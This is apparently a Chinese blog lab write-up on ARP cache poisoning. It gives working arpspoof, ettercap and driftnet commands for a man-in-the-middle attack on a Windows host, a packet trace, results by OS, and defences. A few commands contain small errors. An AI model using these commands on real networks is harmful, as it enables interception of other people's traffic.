定义
ARP spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Generally, the aim is to associate the attacker's MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead.` (By wiki)
拆分如下几个概念:
- 利用缺陷:在 Data Link Layer 利用 ARP 协议安全缺陷
- 攻击范围:限制在 LAN。ARP协议本身特性决定
- 攻击对象:对目标机与(通常)网关。以中间人 Man in the middle(MITM) 身份
场景测试
拓扑
topo4kali_penetration.png涉及工具
- arpspoof
- ettercap
- driftnet
Note: 使用Kali 2.0 Linux 实施。默认这些工具预装。
目的
利用 arpspoof
or ettercap
对LAN中的Windows host(Win10)进行 ARP spoofing 攻击。
- 在攻击host开启 ip_fowoard,默认关闭。如不开启,可以导致断网攻击。
- 运行
arpspoof
## Bi-direction arp spoofing, or cause DOS due to only half traffic being redirected to attacker
## How to use arpspoof
arpspoof -i <interface> -t <target> <default gateway>
arpspoof -i <interface> -t <default gateway> <target>
## Actual commands run
## Gateway's IP 192.168.168.1
## Victim's IP 192.168.168.101
arpspoof -i eth0 192.168.168.101 192.168.168.1
arpspoof -i eth0 192.168.168.1 192.168.168.101
- 利用
driftnet
抓取窃取流量汇总的图片(也可以是音频)
## Capture images from network traffic and display them in an X window.
driftnet -i eth0 -m 200 -a - d ~/Pictures
-i interface
-m maximum picture number to store
-a no print on x-window and just store
-d directory
- (可选)工具
ettercap
替代arpspoof
ettercap -i eth0 -Tq -M arp:remote //192.168.168.101// //192.168.168.1//
参数说明:
-i: 网卡
-T :文本模式(-G 图形界面)
-q:安静模式,仅当嗅探到密码时才显示
-M:攻击方法
-P:加载插件,比如sslstrip
抓包分析
Sniffer (192.168.168.104)-- Win host (192.168.168.101)
------> who is at 101 (request)
<------ win's mac is at 101 (reply)
------> who is at 1 (request)
<------ gw's mac is at 1 (reply)
arpspoof starts
------> gw(Sniffer's mac) is at 1 (reply) ## cheat Win host
------> win(Sniffer's mac) is at 104 (reply) ## cheat Gateway
... repeat above two actions periodically
结论
- Windows(10)/ Android(5.02) can be sniffed
- Iphone(8.4)/Mac(10.11.5) can NOT be sniiffed
由上可见 IOS 与 OSX , 当接收到重复(攻击) ARP reply,并不会强制刷新 arp table 。
应对
- Static ARP entries
配置静态 ARP 条目(N^2 - N) - ARP spoofing detection software
- OS security
取决于不同OS的配置
网友评论